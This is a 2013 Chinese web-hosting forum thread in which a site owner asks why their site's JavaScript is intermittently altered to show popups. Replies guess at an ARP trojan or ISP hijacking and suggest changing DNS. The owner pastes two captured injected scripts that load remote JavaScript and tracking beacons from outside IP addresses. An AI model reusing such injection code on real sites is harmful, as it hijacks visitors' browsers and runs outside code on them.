全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 11124|回复: 26
打印 上一主题 下一主题

[Windows VPS] 遇到一个怪问题 网站的js被随机篡改 加入了弹窗 ,求解?

[复制链接]
跳转到指定楼层
1#
发表于 2013-4-15 12:28:39 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
一个小站,本身未加弹窗,结果打开时弹出一个弹窗,然后刷新没有了,过段时间再打开又有弹窗,查看源代码,发现里面的js被篡改。但是上服务器上打开js查看又是正常的。基本排除网站程序的问题,网上搜索的结果一般认为是电信强加广告,但是我访问其他站一次也没出现过,独访问这个站才有弹窗。也有认为是arp攻击。求大神解答,这问题搞得好头疼。附js代码如下:
var _objparam_51_ = new Object;
_objparam_51_.p = 1365966787;
_objparam_51_.aid = 49;
_objparam_51_.stat = 'http://76.73.85.179/stat/img.php?p='+_objparam_51_.p+'&aid='+_objparam_51_.aid+'&acid=1&area=440600&uid=31633&ucid=73';
_objparam_51_.otherstat = 'http://76.73.85.179/stat/otherstat.php?type=2&aid='+_objparam_51_.aid;
_objparam_51_.expires = 10;
_objparam_51_.oldurl = 'http://小站域名.com/js/bot2.js?p=1';
_objparam_51_.url = 'http://www.lftyx.com/a195338.php?W2Ce78=2&p=1365966787&c=1900483101';
window.setTimeout(function(){var a=document.createElement("script");a.src=_objparam_51_.oldurl;document.getElementsByTagName("head")[0].appendChild(a);},0);
window.setTimeout(function(){var a=document.createElement("script");a.src="http://76.73.85.179/js/utils51.js";document.getElementsByTagName("head")[0].appendChild(a);},0);
<!--

还有一个
var _objparam_51_ = new Object;
_objparam_51_.p = 1365972238;
_objparam_51_.aid = 45;
_objparam_51_.stat = 'http://67.159.44.187/stat/img.php?p='+_objparam_51_.p+'&aid='+_objparam_51_.aid+'&acid=1&area=440600&uid=31633&ucid=73';
_objparam_51_.otherstat = 'http://67.159.44.187/stat/otherstat.php?type=2&aid='+_objparam_51_.aid;
_objparam_51_.expires = 10;
_objparam_51_.oldurl = 'http://小站域名.com/js/xp.js?p=1';
_objparam_51_.url = 'http://www.51zhenxin.info/a195338.php?W2Ce78=1&p=1365972238&c=1900483101';
window.setTimeout(function(){var a=document.createElement("script");a.src=_objparam_51_.oldurl;document.getElementsByTagName("head")[0].appendChild(a);},0);
window.setTimeout(function(){var a=document.createElement("script");a.src="http://67.159.44.187/js/utils51.js";document.getElementsByTagName("head")[0].appendChild(a);},0);
<!--


小站域名,我就省略了。
不知是否有朋友遇到过?盼解答,为谢。
27#
发表于 2013-5-4 18:23:00 来自手机 | 只看该作者
Arp...
26#
 楼主| 发表于 2013-5-4 18:04:57 | 只看该作者
doors 发表于 2013-5-4 16:19
你这个是中ARP木马了吧?

不是太清楚。头疼。
25#
发表于 2013-5-4 16:19:40 | 只看该作者
你这个是中ARP木马了吧?
24#
发表于 2013-5-4 16:07:11 | 只看该作者
路由,把广东电信官方网站全封了,还有几个做DNS劫持的IP段都封掉。。干净了。
23#
发表于 2013-5-4 14:07:28 | 只看该作者
寂寞的公安 发表于 2013-5-4 11:20
DNS 为8.8.8.8,问题依旧。

设置8.8.8.8 之后刷新dns缓存,win电脑 cmd 输入ipconfig /flushdns  
22#
 楼主| 发表于 2013-5-4 11:20:21 | 只看该作者
Tou 发表于 2013-5-4 01:35
修改DNS 为8.8.8.8 和8.8.4.4 或者国内的114.114.114.114

DNS 为8.8.8.8,问题依旧。
21#
 楼主| 发表于 2013-5-4 11:14:57 | 只看该作者
wix 发表于 2013-5-3 21:27
你这个问题解决了吗.最近我也遇到这样的问题.弹的都是黄色内容

还没解决,不能确定原因。
20#
 楼主| 发表于 2013-5-4 11:11:05 | 只看该作者
mslxd 发表于 2013-5-4 11:08
你试试别的地区访问网站看看

别的地区没有的话,就是强加的

别的地区是没有,他这个广告好像是随机出现的。但是我现在只在我的站上看到,别人的站上一次也没出现过,所以有点怀疑机器被挂马了。
19#
发表于 2013-5-4 11:08:38 | 只看该作者
你试试别的地区访问网站看看

别的地区没有的话,就是强加的
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2025-11-13 15:17 , Processed in 0.198157 second(s), 13 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表